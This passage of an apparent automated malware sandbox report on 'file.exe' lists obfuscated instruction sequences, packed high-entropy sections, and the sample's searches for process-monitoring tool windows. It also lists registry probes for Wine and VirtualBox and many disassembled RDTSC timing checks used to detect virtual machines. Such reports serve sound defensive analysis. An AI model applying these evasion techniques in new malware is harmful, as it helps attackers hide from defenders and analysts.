                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004BF05B push 7C0787D3h; mov dword ptr [esp], esi0_2_004BF112
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004BF05B push 0289C9A1h; mov dword ptr [esp], ebp0_2_004BF136
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004BF05B push 6CFE57E3h; mov dword ptr [esp], eax0_2_004BF1F3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005DB875 push edx; mov dword ptr [esp], eax0_2_005DB8AB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005DB875 push ecx; mov dword ptr [esp], 77EBC99Ah0_2_005DB8BE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005DB875 push eax; mov dword ptr [esp], edx0_2_005DB93F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005DB875 push ebx; mov dword ptr [esp], edx0_2_005DB94E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005DB875 push edx; mov dword ptr [esp], eax0_2_005DB9D3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005DB875 push edx; mov dword ptr [esp], 7F7F53D1h0_2_005DB9D7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005DB875 push eax; mov dword ptr [esp], 701E3BBEh0_2_005DBA87
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005DB875 push ecx; mov dword ptr [esp], 7C9EB8C5h0_2_005DBB05
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005DB875 push edx; mov dword ptr [esp], edi0_2_005DBB2F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005DB875 push 11BE6005h; mov dword ptr [esp], esi0_2_005DBB9F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005DB875 push edi; mov dword ptr [esp], edx0_2_005DBBAC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005DB875 push 7D98D11Eh; mov dword ptr [esp], ebp0_2_005DBC5F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005DB875 push 53D61649h; mov dword ptr [esp], esi0_2_005DBCD4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005DB875 push ebp; mov dword ptr [esp], edi0_2_005DBD2B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005DB875 push ebx; mov dword ptr [esp], ecx0_2_005DBD42
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005DB875 push 0AD1477Ah; mov dword ptr [esp], ebp0_2_005DBE90
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005DB875 push 0C227A61h; mov dword ptr [esp], esi0_2_005DBEAE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005DB875 push 5F6FC6DDh; mov dword ptr [esp], ebp0_2_005DBEFE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005DB875 push 2CA85D44h; mov dword ptr [esp], ecx0_2_005DBF10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005DB875 push 145F30C7h; mov dword ptr [esp], ebx0_2_005DBF6D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005DB875 push 336DDACCh; mov dword ptr [esp], eax0_2_005DBF7F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005DB875 push 6B1A07ABh; mov dword ptr [esp], edx0_2_005DBFEE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D90DF push edi; mov dword ptr [esp], ecx0_2_005D90E4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D90DF push ecx; mov dword ptr [esp], 0C721A36h0_2_005D90E8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D90DF push eax; mov dword ptr [esp], edx0_2_005D9132
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D90DF push 1DF1395Ah; mov dword ptr [esp], edx0_2_005D917D
                Source: file.exeStatic PE information: section name: entropy: 7.939522646317655
                Source: file.exeStatic PE information: section name: xdrminwo entropy: 7.9497278462939756

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior

                Malware Analysis System Evasion

                barindex
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47451E second address: 474531 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F7E2CC83C98h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EA6C9 second address: 5EA6D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F7E2CD3B836h 0x0000000a popad 0x0000000b pop ebx 0x0000000c push edi 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E9CAE second address: 5E9CB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E9E23 second address: 5E9E3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CD3B843h 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EBDDC second address: 5EBE1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 xor dword ptr [esp], 45F2E1BEh 0x0000000c movsx ecx, si 0x0000000f lea ebx, dword ptr [ebp+1244B96Dh] 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007F7E2CC83C98h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 00000016h 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f mov dx, bx 0x00000032 push eax 0x00000033 js 00007F7E2CC83CA4h 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EBE1D second address: 5EBE21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60BC55 second address: 60BC77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F7E2CC83CA7h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60C495 second address: 60C49B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60C49B second address: 60C4A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60C4A0 second address: 60C4C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7E2CD3B847h 0x00000008 jbe 00007F7E2CD3B836h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60C4C2 second address: 60C4C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60C4C8 second address: 60C4D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60C632 second address: 60C642 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83C9Ah 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60C972 second address: 60C976 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60C976 second address: 60C988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F7E2CC83C96h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60C988 second address: 60C9C9 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7E2CD3B836h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F7E2CD3B842h 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F7E2CD3B841h 0x0000001a jmp 00007F7E2CD3B83Eh 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60C9C9 second address: 60C9D3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7E2CC83C96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 600423 second address: 600437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F7E2CD3B83Ah 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 600437 second address: 600441 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7E2CC83C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 600441 second address: 600459 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7E2CD3B83Dh 0x00000008 jg 00007F7E2CD3B836h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 600459 second address: 600472 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jbe 00007F7E2CC83C96h 0x0000000c jmp 00007F7E2CC83C9Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E10F4 second address: 5E1100 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F7E2CD3B836h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E1100 second address: 5E1137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F7E2CC83CA1h 0x0000000b jnc 00007F7E2CC83C96h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pushad 0x00000015 jmp 00007F7E2CC83CA4h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60D1A2 second address: 60D1B9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F7E2CD3B842h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60D1B9 second address: 60D1C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60D1C2 second address: 60D1C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60D1C6 second address: 60D1CC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61145E second address: 611463 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 611463 second address: 611469 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 611469 second address: 611481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E2CD3B844h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 611481 second address: 611491 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7E2CC83C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 611491 second address: 611495 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E2BBF second address: 5E2BC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E2BC5 second address: 5E2BE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F7E2CD3B844h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f js 00007F7E2CD3B836h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E2BE9 second address: 5E2BED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E2BED second address: 5E2BFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F7E2CD3B836h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E2BFB second address: 5E2BFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E2BFF second address: 5E2C11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 js 00007F7E2CD3B83Eh 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D1EE3 second address: 5D1EE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D1EE7 second address: 5D1EEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D1EEB second address: 5D1EF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D1EF1 second address: 5D1F08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F7E2CD3B840h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617086 second address: 61708A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61733F second address: 61734B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F7E2CD3B836h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D1EDB second address: 5D1EE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617759 second address: 617768 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7E2CD3B838h 0x00000008 push eax 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 619730 second address: 619734 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 619734 second address: 619738 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 619B6D second address: 619B73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 619C77 second address: 619C7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61A3E6 second address: 61A3FB instructions: 0x00000000 rdtsc 0x00000002 js 00007F7E2CC83C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c jl 00007F7E2CC83C9Eh 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61A642 second address: 61A65B instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7E2CD3B836h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jp 00007F7E2CD3B844h 0x00000011 push eax 0x00000012 push edx 0x00000013 jc 00007F7E2CD3B836h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61A98B second address: 61A991 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61A991 second address: 61A9BB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b xchg eax, ebx 0x0000000c jng 00007F7E2CD3B854h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F7E2CD3B846h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61A9BB second address: 61A9CB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007F7E2CC83C96h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61B8D8 second address: 61B931 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F7E2CD3B836h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 mov dword ptr [ebp+122D2936h], ebx 0x00000017 push 00000000h 0x00000019 jmp 00007F7E2CD3B840h 0x0000001e pushad 0x0000001f mov edi, 6DB40BF5h 0x00000024 mov dword ptr [ebp+122D3C5Dh], eax 0x0000002a popad 0x0000002b push 00000000h 0x0000002d clc 0x0000002e xchg eax, ebx 0x0000002f jmp 00007F7E2CD3B840h 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 je 00007F7E2CD3B83Ch 0x0000003d jno 00007F7E2CD3B836h 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61E341 second address: 61E354 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jnl 00007F7E2CC83C9Eh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61F521 second address: 61F57D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 ja 00007F7E2CD3B844h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F7E2CD3B838h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 movzx esi, di 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f mov edi, eax 0x00000031 xchg eax, ebx 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F7E2CD3B848h 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6209EB second address: 620A66 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7E2CC83C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F7E2CC83C98h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push edx 0x0000002d call 00007F7E2CC83C98h 0x00000032 pop edx 0x00000033 mov dword ptr [esp+04h], edx 0x00000037 add dword ptr [esp+04h], 00000019h 0x0000003f inc edx 0x00000040 push edx 0x00000041 ret 0x00000042 pop edx 0x00000043 ret 0x00000044 mov esi, 30D67B93h 0x00000049 or esi, 37623AEAh 0x0000004f push 00000000h 0x00000051 je 00007F7E2CC83CA5h 0x00000057 jmp 00007F7E2CC83C9Fh 0x0000005c push eax 0x0000005d pushad 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 popad 0x00000062 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62079A second address: 62079E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6214A7 second address: 6214AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6214AB second address: 6214B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D70EB second address: 5D711D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F7E2CC83C96h 0x0000000a popad 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 jmp 00007F7E2CC83C9Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 jns 00007F7E2CC83C96h 0x0000001e jmp 00007F7E2CC83C9Dh 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D711D second address: 5D7121 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 626E39 second address: 626E70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 jnc 00007F7E2CC83C96h 0x0000000f jmp 00007F7E2CC83CA6h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F7E2CC83C9Fh 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 627067 second address: 6270F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov dword ptr [esp], eax 0x00000008 sub dword ptr [ebp+122D2E95h], ebx 0x0000000e ja 00007F7E2CD3B83Ch 0x00000014 push dword ptr fs:[00000000h] 0x0000001b push 00000000h 0x0000001d push edi 0x0000001e call 00007F7E2CD3B838h 0x00000023 pop edi 0x00000024 mov dword ptr [esp+04h], edi 0x00000028 add dword ptr [esp+04h], 00000015h 0x00000030 inc edi 0x00000031 push edi 0x00000032 ret 0x00000033 pop edi 0x00000034 ret 0x00000035 jmp 00007F7E2CD3B842h 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 mov eax, dword ptr [ebp+122D1755h] 0x00000047 mov di, 3D16h 0x0000004b push FFFFFFFFh 0x0000004d push 00000000h 0x0000004f push ebp 0x00000050 call 00007F7E2CD3B838h 0x00000055 pop ebp 0x00000056 mov dword ptr [esp+04h], ebp 0x0000005a add dword ptr [esp+04h], 00000015h 0x00000062 inc ebp 0x00000063 push ebp 0x00000064 ret 0x00000065 pop ebp 0x00000066 ret 0x00000067 nop 0x00000068 push eax 0x00000069 push edx 0x0000006a je 00007F7E2CD3B83Ch 0x00000070 jp 00007F7E2CD3B836h 0x00000076 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 629F83 second address: 629F8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ebx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62AFAD second address: 62AFC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CD3B845h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
